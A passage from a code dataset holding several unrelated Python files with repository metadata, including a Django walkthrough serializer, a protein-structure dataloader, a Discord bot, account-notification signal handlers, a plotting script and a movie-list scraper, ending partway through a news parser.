legacy_author_name = serializers.ReadOnlyField()\n\n status = serializers.ReadOnlyField()\n rejection_reason = serializers.ReadOnlyField()\n\n class Meta:\n model = Walkthrough\n fields = [\n \"id\",\n \"level\",\n \"author\",\n \"legacy_author_name\",\n \"status\",\n \"rejection_reason\",\n \"walkthrough_type\",\n \"text\",\n \"created\",\n \"last_updated\",\n ]\n\n\nclass WalkthroughDetailsSerializer(WalkthroughListingSerializer):\n level_id = serializers.PrimaryKeyRelatedField(\n write_only=True, source=\"level\", queryset=Level.objects.all()\n )\n text = CustomCharField(\n validators=[MinLengthValidator(0)], collapse_whitespace=False\n )\n\n class Meta:\n model = Walkthrough\n fields = WalkthroughListingSerializer.Meta.fields + [\n \"level_id\",\n ]\n\n def validate(self, data):\n validated_data = super().validate(data)\n\n author = (\n self.instance.author\n if self.instance\n else self.context[\"request\"].user\n )\n validated_data[\"author\"] = author\n\n walkthrough_type = (\n validated_data.get(\"walkthrough_type\")\n or self.instance.walkthrough_type\n )\n\n level = validated_data.get(\"level\", None)\n if (\n level\n and level.walkthroughs.filter(author=author)\n .filter(walkthrough_type=walkthrough_type)\n .exclude(id=self.instance.id if self.instance else None)\n .exists()\n ):\n raise serializers.ValidationError(\n {\n \"detail\": \"You have already posted a walkthrough \"\n \"of this type for this level.\"\n }\n )\n\n if walkthrough_type == WalkthroughType.LINK:\n validator = URLValidator()\n try:\n validator(validated_data.get(\"text\"))\n except ValidationError:\n raise serializers.ValidationError(\n {\"text\": [\"Enter a valid URL.\"]}\n ) from None\n\n return validated_data\n\n def create(self, validated_data):\n func = super().create\n\n def walkthrough_factory():\n return func(validated_data)\n\n walkthrough = walkthrough_factory()\n walkthrough.save()\n update_awards.delay(walkthrough.author.pk)\n return walkthrough\n\n def update(self, instance, validated_data):\n func = super().update\n\n def walkthrough_factory():\n return func(instance, validated_data)\n\n walkthrough = walkthrough_factory()\n walkthrough.save()\n if walkthrough.status == WalkthroughStatus.APPROVED:\n send_walkthrough_update_mail(walkthrough)\n update_awards.delay(walkthrough.author.pk)\n return walkthrough\n\n\nclass WalkthroughRejectionSerializer(serializers.Serializer):\n reason = CustomCharField(collapse_whitespace=False, max_length=500)\n","repo_name":"rr-/TRCustoms","sub_path":"backend/trcustoms/walkthroughs/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"33550670653","text":"import math\nimport sys\nimport random\nimport numpy as np\nimport pandas as pd\nfrom scipy.spatial import KDTree\nimport torch\nfrom torch.utils import data\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pad_sequence\n\nsys.path.append('../../../atom3d')\nimport atom3d.shard.shard as sh\n\nPROT_ATOMS = ('C', 'O', 'N', 'S', 'P')\nRES_LABEL = ('LEU', 'ILE', 'VAL', 'TYR', 'ARG', 'GLU', 'PHE', 'ASP', 'THR', 'LYS', \n 'ALA', 'GLY', 'TRP', 'SER', 'PRO', 'ASN', 'GLN', 'HIS', 'MET', 'CYS')\nWEIGHT_P = 1.4\n\nclass ResDel_Dataset(data.IterableDataset):\n def __init__(self, sharded, max_radius=10.0, seed=131313):\n self.sharded = sh.Sharded(sharded, None)\n self.num_shards = self.sharded.get_num_shards()\n self.seed = seed\n self.max_radius = max_radius\n\n def __iter__(self):\n worker_info = torch.utils.data.get_worker_info()\n if worker_info is None: # single-process data loading, return the full iterator\n gen = dataset_generator(self.sharded, range(self.num_shards), \n self.max_radius, shuffle=True)\n\n else: # in a worker process, split workload\n per_worker = int(math.ceil(self.num_shards / float(worker_info.num_workers)))\n worker_id = worker_info.id\n iter_start = worker_id * per_worker\n iter_end = min(iter_start + per_worker, self.num_shards)\n gen = dataset_generator(self.sharded, range(self.num_shards)[iter_start:iter_end],\n self.max_radius, shuffle=True)\n return gen\n\n\nclass AtomEnvironment:\n def __init__(self, pos, label, class_weights):\n self.pos = pos\n self.label = label\n self.class_weights = class_weights\n\n\nclass DataLoader(data.DataLoader):\n r\"\"\"Data loader which merges data objects from a\n :class:`torch_geometric.data.dataset` to a mini-batch.\n Args:\n dataset (Dataset): The dataset from which to load the data.\n batch_size (int, optional): How many samples per batch to load.\n (default: :obj:`1`)\n shuffle (bool, optional): If set to :obj:`True`, the data will be\n reshuffled at every epoch. (default: :obj:`False`)\n follow_batch (list or tuple, optional): Creates assignment batch\n vectors for each key in the list. (default: :obj:`[]`)\n \"\"\"\n\n def __init__(self, dataset, batch_size=1, shuffle=False, **kwargs):\n super(DataLoader,\n self).__init__(dataset, batch_size, shuffle,\n collate_fn=custom_collate, **kwargs)\n\n\ndef dataset_generator(sharded, shard_indices, max_radius, shuffle=True):\n \"\"\"\n Generate grids from sharded dataset\n \"\"\"\n\n for shard_idx in shard_indices:\n shard = sharded.read_shard(shard_idx)\n if shuffle:\n groups = [df for _, df in shard.groupby(['ensemble', 'subunit'])]\n random.shuffle(groups)\n shard = pd.concat(groups).reset_index(drop=True)\n\n for e, target_df in shard.groupby(['ensemble', 'subunit']):\n _, subunit = e\n res_name = subunit.split('_')[-1]\n label = RES_LABEL.index(res_name)\n protein = df_to_graph(target_df, subunit, label, max_radius)\n if protein is None:\n continue\n\n yield protein\n\n\ndef df_to_graph(struct_df, chain_res, label, max_radius):\n \"\"\"\n label: residue label (int)\n chain_res: chain ID_residue ID_residue name defining center residue\n struct_df: Dataframe with entire environment\n \"\"\"\n chain, resnum, _ = chain_res.split('_')\n res_df = struct_df[(struct_df.chain == chain) & (struct_df.residue.astype(str) == resnum)]\n if 'CA' not in res_df.name.tolist():\n return None\n CA_pos = res_df[res_df['name']=='CA'][['x', 'y', 'z']].astype(np.float32).to_numpy()[0]\n kd_tree = KDTree(struct_df[['x','y','z']].to_numpy())\n neighbors_pt_idx = kd_tree.query_ball_point(CA_pos, r=max_radius, p=2.0)\n neighbors_df = struct_df.iloc[neighbors_pt_idx].reset_index(drop=True)\n\n atom_pos = neighbors_df[['x', 'y', 'z', 'element']].to_numpy()\n atom_pos[..., :3] = atom_pos[..., :3] - CA_pos\n \n for i in range(len(atom_pos)):\n if atom_pos[i][3] in PROT_ATOMS:\n atom_pos[i][3] = PROT_ATOMS.index(atom_pos[i][3])\n else:\n atom_pos[i][3] = len(PROT_ATOMS)\n\n count_keys = struct_df['resname'].value_counts().keys().to_numpy()\n count_values = struct_df['resname'].value_counts().to_numpy()\n class_weights = torch.zeros(len(RES_LABEL))\n for i, value in enumerate(count_values):\n if count_keys[i] in RES_LABEL:\n class_weights[RES_LABEL.index(count_keys[i])] = 1/(float(value))**WEIGHT_P\n class_weights = F.normalize(class_weights, p=1, dim=0)\n\n return AtomEnvironment(torch.tensor(atom_pos.astype(np.float32)), label, class_weights)\n \n\ndef custom_collate(data_list):\n pos = pad_sequence([atom_env.pos for atom_env in data_list]).permute(1, 0, 2)\n labels = torch.tensor([atom_env.label for atom_env in data_list])\n class_weights = torch.cat([atom_env.class_weights.unsqueeze(-1) for atom_env in data_list], dim=-1).permute(1, 0)\n\n return AtomEnvironment(pos, labels, class_weights)","repo_name":"drorlab/gert","sub_path":"src/atom3d_combined/data/res/res_dataloader.py","file_name":"res_dataloader.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"3598263002","text":"import argparse\nimport json\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom pdo.client.controller.commands.send import send_to_contract\nfrom pdo.client.controller.util import *\nfrom pdo.contract import invocation_request\n\n## -----------------------------------------------------------------\n## -----------------------------------------------------------------\ndef __command_auction__(state, bindings, pargs) :\n \"\"\"controller command to interact with an auction contract\n \"\"\"\n\n parser = argparse.ArgumentParser(prog='auction')\n parser.add_argument('-e', '--enclave', help='URL of the enclave service to use', type=str)\n parser.add_argument('-f', '--save-file', help='File where contract data is stored', type=str)\n parser.add_argument('-q', '--quiet', help='Suppress printing the result', action='store_true')\n parser.add_argument('-w', '--wait', help='Wait for the transaction to commit', action='store_true')\n\n subparsers = parser.add_subparsers(dest='command')\n\n subparser = subparsers.add_parser('get_signing_key')\n subparser.add_argument('-s', '--symbol', help='binding symbol for result', type=str)\n\n subparser = subparsers.add_parser('initialize')\n subparser.add_argument('-k', '--key', help='public key of the asset contract', type=str, required=True)\n\n subparser = subparsers.add_parser('prime')\n subparser.add_argument('-a', '--attestation', help='Escrow attestation from the asset ledger', type=invocation_parameter, required=True)\n\n subparser = subparsers.add_parser('submit_bid')\n subparser.add_argument('-a', '--attestation', help='Escrow attestation from the asset ledger', type=invocation_parameter, required=True)\n\n subparser = subparsers.add_parser('get_offered_asset')\n subparser = subparsers.add_parser('cancel_bid')\n subparser = subparsers.add_parser('check_bid')\n\n subparser = subparsers.add_parser('max_bid')\n subparser.add_argument('-s', '--symbol', help='binding symbol for result', type=str)\n\n subparser = subparsers.add_parser('close_bidding')\n\n subparser = subparsers.add_parser('exchange_attestation')\n subparser.add_argument('-s', '--symbol', help='binding symbol for result', type=str)\n\n subparser = subparsers.add_parser('cancel_attestation')\n subparser.add_argument('-s', '--symbol', help='binding symbol for result', type=str)\n\n options = parser.parse_args(pargs)\n\n extraparams={'quiet' : options.quiet, 'wait' : options.wait}\n\n if options.command == 'get_signing_key' :\n message = invocation_request('get-public-signing-key')\n result = send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n if result and options.symbol :\n bindings.bind(options.symbol, result)\n return\n\n if options.command == 'initialize' :\n message = invocation_request('initialize', options.key)\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'prime' :\n assert type(options.attestation) is list\n assert len(options.attestation) == 3\n\n bidinfo = options.attestation[0]\n dependencies = options.attestation[1]\n signature = options.attestation[2]\n message = invocation_request('prime-auction*', bidinfo, dependencies, signature)\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'submit_bid' :\n assert type(options.attestation) is list\n assert len(options.attestation) == 3\n\n bidinfo = options.attestation[0]\n dependencies = options.attestation[1]\n signature = options.attestation[2]\n message = invocation_request('submit-bid*',bidinfo, dependencies, signature)\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'get_offered_asset' :\n message = invocation_request('get-offered-asset')\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'cancel_bid' :\n message = invocation_request('cancel-bid')\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'check_bid' :\n message = invocation_request('check-bid')\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'max_bid' :\n message = invocation_request('max-bid')\n result = send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n if options.symbol :\n bindings.bind(options.symbol, result)\n return\n\n if options.command == 'close_bidding' :\n message = invocation_request('close-bidding')\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'cancel_attestation' :\n message = invocation_request('cancel-attestation')\n result = send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n if options.symbol :\n bindings.bind(options.symbol, json.dumps(result))\n return\n\n if options.command == 'exchange_attestation' :\n message = invocation_request('exchange-attestation')\n result = send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n if options.symbol :\n bindings.bind(options.symbol, json.dumps(result))\n return\n\n## -----------------------------------------------------------------\n## -----------------------------------------------------------------\ndef do_auction(self, args) :\n \"\"\"\n auction -- invoke integer key commands\n \"\"\"\n\n try :\n pargs = self.__arg_parse__(args)\n __command_auction__(self.state, self.bindings, pargs)\n except SystemExit as se :\n return self.__arg_error__('auction', args, se.code)\n except Exception as e :\n return self.__error__('auction', args, str(e))\n\n return False\n\n## -----------------------------------------------------------------\n## -----------------------------------------------------------------\ndef load_commands(cmdclass) :\n setattr(cmdclass, 'do_auction', do_auction)\n","repo_name":"Yeuman/project4","sub_path":"common/crypto/pdo/contracts/auction/integer-key-auction.py","file_name":"integer-key-auction.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39513074320","text":"import os\nimport discord\nfrom discord import app_commands\nfrom config import get_settings\nfrom discord.ext import commands\nfrom discord.ext.commands.context import Context\nfrom discord import Message, Guild\nfrom src.models.user_model import UserModel\n\nfrom src.db.database import db_instance\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nDEBUG = get_settings().DEBUG\nBOT_TOKEN = get_settings().BOT_TOKEN\n\nclass MyClient(commands.Bot):\n async def on_ready(self):\n try:\n synced = await self.tree.sync()\n print(f\"Synced {len(synced)} command(s)\")\n for command in synced:\n print(f\"Command: {command}\")\n except Exception as e:\n print(e)\n exit()\n print(\"------\")\n print(f\"Logged in as {self.user} (ID: {self.user.id})\")\n print(\"------\")\n for guild in self.guilds:\n collection = db_instance.get_collection(str(guild.id))\n print(f\"--- {guild.name} ---\")\n for member in guild.members:\n find = collection.find_one({\"id\": str(member.id)})\n if find is None and not member.bot:\n user = UserModel(member.name, str(member.id))\n collection.insert_one(user.__dict__)\n print(member)\n print(f\"--- end ---\\n\\n\")\n print(\"--- Ready ---\")\n\n async def setup_hook(self):\n for extension in cogs:\n await self.load_extension(extension)\n\n async def on_guild_join(self, guild: Guild):\n for channel in guild.text_channels:\n print(channel.name)\n if channel.permissions_for(guild.me).send_messages:\n await channel.send(f\"Olá, {guild.name}, eu sou Jotchua!\")\n break\n\n async def on_message(self, message: Message):\n author = message.author\n if not author.bot:\n collection = db_instance.get_collection(str(message.guild.id))\n user = collection.find_one({\"id\": str(author.id)})\n if user is None:\n user = UserModel(author.name, str(author.id))\n collection.insert_one(user.__dict__)\n else:\n del user[\"_id\"]\n user = UserModel(**user)\n user.add_xp(5)\n collection.update_one({\"id\": str(author.id)}, {\"$set\": user.__dict__})\n await self.process_commands(message)\n\nintents = discord.Intents.default()\nintents.members = True\nintents.message_content = True\ncommand_prefix = [\"jot!\", \"j!\"]\n\ncogs = [\"src.comandos.basic\", \"src.comandos.social\", \"src.comandos.rp\"]\n\nclient = MyClient(intents=intents, command_prefix=command_prefix)\nclient.run(BOT_TOKEN)\n","repo_name":"pedrozle/jotchua-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"3"} +{"seq_id":"36465976891","text":"import time\n\nfrom django.dispatch import receiver\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils import timezone\n\nfrom . import models\nfrom . import signals\n\nfrom django_slack import slack_message\nfrom django.core.mail import send_mail\n\n@receiver(signals.revoked_profile)\ndef email_revoked_profile(sender, username, organisation, email, reason, **kwargs):\n send_mail(\n '[majora@climb] Your account has been closed',\n '''You're receiving this email because your %s account (username %s) has been closed.\n\n As a result of this:\n * You will no longer be able to use your Majora account to access data.\n * You will be unable to access CLIMB systems with SSH or upload files with rsync.\n * Any API requests you send will now be rejected.\n\n If you do not believe this should have happened, please contact %s as soon as possible. Do not contact the CLIMB team or #account-requests with requests to be reactivated.\n ''' % (settings.INSTANCE_NAME, username, \"the accounts team (%s)\" % settings.MAJORA_ACCOUNT_MAIL if hasattr(settings, \"MAJORA_ACCOUNT_MAIL\") and len(settings.MAJORA_ACCOUNT_MAIL) > 0 else \"your site lead\"),\n None,\n [email],\n fail_silently=True,\n )\n if settings.SLACK_CHANNEL:\n slack_message('slack/blank', {\n }, [{\n \"mrkdwn_in\": [\"text\", \"pretext\", \"fields\"],\n \"title\": \"User profile revoked\",\n \"title_link\": \"\",\n \"text\": \"Access for %s has been revoked\" % (username),\n \"footer\": \"Revocation spotted by Majora\",\n \"footer_icon\": \"https://avatars.slack-edge.com/2019-05-03/627972616934_a621b7d3a28c2b6a7bd1_512.jpg\",\n\n \"fields\": [\n {\n \"title\": \"Metadata\",\n \"short\": False\n },\n {\n \"title\": \"Email\",\n \"short\": True\n },\n {\n \"value\": email,\n \"short\": True\n },\n {\n \"title\": \"Org Code\",\n \"short\": True\n },\n {\n \"value\": organisation,\n \"short\": True\n },\n {\n \"title\": \"Reason\",\n \"short\": True\n },\n {\n \"value\": reason,\n \"short\": True\n },\n ],\n \"ts\": int(time.time()),\n }])\n\n@receiver(signals.new_registration)\ndef recv_new_registration(sender, username, first_name, last_name, organisation, email, **kwargs):\n from django.contrib.auth.models import User, Permission\n perm = Permission.objects.get(codename='can_approve_profiles')\n site_admins = models.Profile.objects.filter(user__user_permissions=perm, institute__name=organisation) # TODO works for users specifically given this perm\n send_mail(\n '[majora@climb] A user has requested access to Majora for your organisation',\n '''You're receiving this email because %s %s has requested a %s account and you are responsible for approving accounts for your organisation.\n Please verify the user and if the request is valid, approve the request from Majora: %s/%s\n ''' % (first_name, last_name, settings.INSTANCE_NAME, settings.SITE_URL if hasattr(settings, \"SITE_URL\") else \"\", reverse('list_site_profiles')),\n None,\n [p.user.email for p in site_admins],\n fail_silently=True,\n )\n if settings.SLACK_CHANNEL:\n slack_message('slack/blank', {\n }, [{\n \"mrkdwn_in\": [\"text\", \"pretext\", \"fields\"],\n \"title\": \"New user registration WAITING for approval by site\",\n \"title_link\": \"\",\n \"text\": \"%s %s (%s) requested account %s to be added\" % (first_name, last_name, organisation, username),\n \"footer\": \"New user spotted by Majora\",\n \"footer_icon\": \"https://avatars.slack-edge.com/2019-05-03/627972616934_a621b7d3a28c2b6a7bd1_512.jpg\",\n\n \"fields\": [\n {\n \"title\": \"Metadata\",\n \"short\": False\n },\n {\n \"title\": \"Email\",\n \"short\": True\n },\n {\n \"value\": email,\n \"short\": True\n },\n {\n \"title\": \"Organisation\",\n \"short\": True\n },\n {\n \"value\": organisation,\n \"short\": True\n },\n {\n \"title\": \"Approvers\",\n \"short\": True\n },\n {\n \"value\": str([\"%s %s\" % (x.user.first_name, x.user.last_name) for x in site_admins]),\n \"short\": True\n },\n ],\n \"ts\": int(time.time()),\n }])\n\n@receiver(signals.new_sample)\ndef recv_new_sample(sender, sample_id, submitter, **kwargs):\n if settings.SLACK_CHANNEL:\n slack_message('slack/blank', {\n }, [{\n \"text\": \"Sample %s uploaded from %s\" % (sample_id, submitter),\n #\"footer\": \"New sample spotted by Majora\",\n #\"footer_icon\": \"https://avatars.slack-edge.com/2019-05-03/627972616934_a621b7d3a28c2b6a7bd1_512.jpg\",\n #\"ts\": int(time.time()),\n }])\n\n@receiver(signals.site_approved_registration)\ndef recv_site_approval(sender, approver, approved_profile, **kwargs):\n from tatl.models import TatlPermFlex\n treq = TatlPermFlex(\n user = sender.user,\n substitute_user = None,\n used_permission = \"can_approve_profiles\",\n timestamp = timezone.now(),\n content_object = approved_profile,\n )\n treq.save()\n if settings.SLACK_CHANNEL:\n slack_message('slack/blank', {\n }, [{\n \"mrkdwn_in\": [\"text\", \"pretext\", \"fields\"],\n \"title\": \"New user registration approved by site\",\n \"title_link\": \"\",\n \"text\": \"%s %s (%s) requested account %s to be added\" % (approved_profile.user.first_name, approved_profile.user.last_name, approved_profile.institute.name, approved_profile.user.username),\n \"footer\": \"New user spotted by Majora\",\n \"footer_icon\": \"https://avatars.slack-edge.com/2019-05-03/627972616934_a621b7d3a28c2b6a7bd1_512.jpg\",\n\n \"fields\": [\n {\n \"title\": \"Metadata\",\n \"short\": False\n },\n {\n \"title\": \"User\",\n \"short\": True\n },\n {\n \"value\": approved_profile.user.username,\n \"short\": True\n },\n {\n \"title\": \"Name\",\n \"short\": True\n },\n {\n \"value\": \"%s %s\" % (approved_profile.user.first_name, approved_profile.user.last_name),\n \"short\": True\n },\n {\n \"title\": \"Email\",\n \"short\": True\n },\n {\n \"value\": approved_profile.user.email,\n \"short\": True\n },\n {\n \"title\": \"Organisation\",\n \"short\": True\n },\n {\n \"value\": approved_profile.institute.name,\n \"short\": True\n },\n {\n \"title\": \"Approver\",\n \"short\": True\n },\n {\n \"value\": \"%s %s\" % (approver.first_name, approver.last_name),\n \"short\": True\n },\n ],\n \"ts\": int(time.time()),\n }])\n\n@receiver(signals.activated_registration)\ndef recv_activated_registration(sender, username, email, **kwargs):\n send_mail(\n '[majora@climb] Your access request has been approved',\n '''You're receiving this email because you requested a %s account. Your request has been approved.\n Your username is %s\n\n Please find guidance on using our systems and providing data via: https://docs.covid19.climb.ac.uk/.\n ''' % (settings.INSTANCE_NAME, username),\n None,\n [email],\n fail_silently=False,\n )\n","repo_name":"SamStudio8/majora2","sub_path":"majora2/receivers.py","file_name":"receivers.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"3"} +{"seq_id":"22888072703","text":"import disnake\nfrom disnake.ext import commands\nimport pathlib\nimport os\nfrom permissions import admin_permission_required\n\n\nclass HelpModule(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.command()\n async def help(self, ctx, command_name=None):\n help_embed = disnake.Embed(title=' ', colour=0x00FF80)\n functions = [{'use': 'h.fry {жертва} {на сколько кусочков нарезать}',\n 'desc': '**Хотите кого-то зажарить? Приятного аппетита!**'}]\n for command in functions:\n help_embed.add_field(name=command['desc'], value=command['use'], inline=False)\n help_embed.add_field(value='Знания о остальных командах вы должны добыть в бою',\n name='Остальные команды:', inline=False)\n help_embed.set_author(name=self.bot.user.name, icon_url=self.bot.user.display_avatar.url)\n await ctx.send(embed=help_embed)\n\n @commands.command()\n @admin_permission_required\n async def admin_help(self, ctx, command_name=None):\n if command_name is not None:\n help_texts = os.listdir('help_texts')\n if f'{command_name}.txt' in help_texts:\n path = pathlib.Path('help_texts', f'{command_name}.txt')\n with open(path, 'r', encoding='utf-8') as text:\n help_text = ''.join(text.readlines())\n else:\n if command_name in self.bot.all_commands:\n help_text = '`Команда существует, но справка для неё отсутствует`'\n else:\n help_text = '`Команда не найдена`'\n help_embed = disnake.Embed(title=f'Помощь для команды {command_name}', colour=0xFFFFFF,\n description=help_text)\n await ctx.send(embed=help_embed)\n\n else:\n comm = self.bot.all_commands\n help_text = '\\n'.join(comm)\n help_embed = disnake.Embed(title=f'Список команд', colour=0xFFFFFF, description=help_text)\n await ctx.send(embed=help_embed)\n\n\ndef setup(bot):\n bot.add_cog(HelpModule(bot))\n","repo_name":"KapitanN3mo/HorizonBot","sub_path":"extensions/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24133066565","text":"from datetime import timedelta\nimport signal\n\n\nclass TimeoutException(Exception):\n pass\n\n\ndef are_rectangles_overlapping(rect1, rect2):\n \"\"\"Returns `True` if two rectangles are overlapping.\n\n >>> rectangle1 = (0, 0, 10, 10)\n >>> rectangle2 = (0, 10, 20, 20)\n >>> rectangle3 = (11, 11, 20, 20)\n >>> assert are_rectangles_overlapping(rectangle1, rectangle2)\n >>> assert are_rectangles_overlapping(rectangle2, rectangle3)\n >>> assert not are_rectangles_overlapping(rectangle1, rectangle3)\n \"\"\"\n try:\n f1_x1, f1_x2 = rect1[0], rect1[0] + rect1[2]\n f1_y1, f1_y2 = rect1[1], rect1[1] + rect1[3]\n\n f2_x1, f2_x2 = rect2[0], rect2[0] + rect2[2]\n f2_y1, f2_y2 = rect2[1], rect2[1] + rect2[3]\n except (TypeError, IndexError):\n msg = \"Both parameters must be list-like elements with >=4 elements.\"\n raise AttributeError(msg)\n\n op_x1 = f1_x1 <= f2_x1 <= f1_x2\n op_x2 = f2_x1 <= f1_x1 <= f2_x2\n op_x = op_x1 or op_x2\n\n op_y1 = f2_y1 <= f1_y1 <= f2_y2\n op_y2 = f1_y1 <= f2_y1 <= f1_y2\n op_y = op_y1 or op_y2\n\n return op_x and op_y\n\n\nclass timeout(object):\n \"\"\"A context manager designed to abort an action after given amount of\n time. It takes the same arguments as datetime.timedelta class. Here's a\n functional example:\n\n >>> import time\n >>> start_time = time.time()\n >>> with timeout(seconds=1): \\\n time.sleep(3)\n >>> end_time = time.time()\n >>> assert (end_time - start_time) < 2\n \"\"\"\n def __init__(self, raise_exception=False, **kwargs):\n self.old_handler = None\n self.raise_exception = raise_exception\n self.seconds = timedelta(**kwargs).seconds\n\n def __enter__(self):\n self.old_handler = signal.getsignal(signal.SIGALRM)\n signal.signal(signal.SIGALRM, self.new_handler)\n signal.alarm(self.seconds)\n\n def __exit__(self, exc_type, exc_value, traceback):\n signal.alarm(0)\n signal.signal(signal.SIGALRM, self.old_handler)\n\n is_timeout = exc_type and exc_type != TimeoutException\n if not self.raise_exception and is_timeout:\n return False\n return True\n\n @staticmethod\n def new_handler(signo, frame):\n raise TimeoutException()\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"nikolaik/printermood","sub_path":"printermood/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"34205596885","text":"#!/usr/bin/env python3\n\nfrom os import environ\n\nif \"NOX\" in environ:\n import matplotlib\n matplotlib.use('Agg')\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\nfrom math import log\n\nfilename = sys.argv[1]\n\n# [[(addr, count, age)]]\ndata = []\nper_addr = {}\n\nwith open(filename, \"r\") as f:\n tmp = []\n for line in f.readlines():\n if line.strip() == \"===\":\n data.append(tmp)\n tmp = []\n else:\n split = line.split()\n addr = int(split[0], 16)\n tmp.append((addr, int(split[1]), int(split[2])))\n\n if split[0] not in per_addr:\n per_addr[addr] = [(0, None)]\n\n# Collect info over time per-address\nfor dump in data:\n visited = set()\n for (addr, count, age) in dump:\n per_addr[addr].append((count, age))\n visited.add(addr)\n\n # fill in blanks for the others\n for not_visited in set(per_addr.keys()) - visited:\n per_addr[not_visited].append((0, None))\n\nfig = plt.figure()\n\nbig_array = []\n\nfor addr in sorted(per_addr.keys(), reverse=True):\n data = per_addr[addr]\n counts = [log(d[0]) if d[0] > 1 else d[0] for d in data]\n #counts = [d[0] for d in data]\n counts = np.diff(counts)\n big_array.append(counts)\n #plt.plot(counts, label=addr)\n\nprint(\"processed\")\n\n#LABEL_FREQ=1000\n#labels = list(map(lambda x: hex(x), sorted(per_addr.keys(), reverse=True)))[::LABEL_FREQ]\n\nim = plt.imshow(big_array, cmap = \"Greys\", aspect='auto')\ncbar = plt.colorbar(im)\ncbar.set_label(\"Log Number of accesses\")\n\nplt.ylabel('Huge page Address (sorted)')\nplt.xlabel('Time (# memory accesses, chunks of 1-billion accesses)')\nplt.gca().set_yticklabels(plt.gca().get_yticks(), {'family':'monospace'})\n#plt.yticks(np.arange(0, len(labels)*LABEL_FREQ, LABEL_FREQ), labels)\nplt.yticks([])\n\nax = fig.axes[0]\nax.spines['left'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.spines['bottom'].set_visible(False)\n\nplt.tight_layout()\n\nif \"NOX\" not in environ:\n plt.show()\n\nplt.savefig('{}.png'.format(filename))\n","repo_name":"multifacet/0sim-plotting-scripts","sub_path":"plot-memtrace-by-address.py","file_name":"plot-memtrace-by-address.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71866619603","text":"import numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nclass MyDiscriminator(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.block = nn.Sequential(\r\n nn.Linear(784,1024,bias=True),\r\n nn.ReLU(),\r\n nn.Dropout(p=0.3),\r\n nn.Linear(1024, 512, bias=True),\r\n nn.ReLU(),\r\n nn.Dropout(p=0.3),\r\n nn.Linear(512, 256, bias=True),\r\n nn.ReLU(),\r\n nn.Dropout(p=0.3),\r\n nn.Linear(256, 1, bias=True),\r\n nn.Sigmoid()\r\n )\r\n\r\n def forward(self, x):\r\n return self.block(x)","repo_name":"yd2333/ML-Practice","sub_path":"model/MyDiscriminator.py","file_name":"MyDiscriminator.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31774821422","text":"from bs4 import BeautifulSoup\nimport requests\n# url=\"https://www.empireonline.com/movies/features/best-movies-2/\"\n\n\nurl=\"http://web.archive.org/web/20200821234542/https://www.empireonline.com/movies/features/best-movies-2/\"\n\nresponse=requests.get(url)\nwebhtml=response.text\n\nsoup=BeautifulSoup(webhtml,\"html.parser\")\n# print(soup.prettify())\nal_muvs=soup.find_all(name=\"h3\",class_=\"title\" )\n# print(al_muvs)\n\nnames=[muv.getText() for muv in al_muvs]\nmovie=names[::-1] #[start:stop:step]\n\nwith open(\"movies.txt\",mode=\"w\") as file:\n for muv in movie:\n file.write(f\"{muv}\\n\")\n\n\n","repo_name":"npkeerthi/MustWatchMovies_scrap","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"1436732332","text":"from abc import ABC, abstractclassmethod\nfrom datetime import datetime\nimport re\nimport news.parser.parse_dicts as pd\n\n\nclass Value(ABC):\n def __init__(self, value, type_news) -> None:\n self.type_news = type_news\n self.parse_cmd = pd.PARSE_DICT[type_news]\n\n self.__value: str = \"\"\n self.value: str = value\n\n @property\n @abstractclassmethod\n def value(self) -> str:\n pass\n\n @value.setter\n @abstractclassmethod\n def value(self, value) -> str:\n pass\n\n\nclass ArticleName(Value):\n 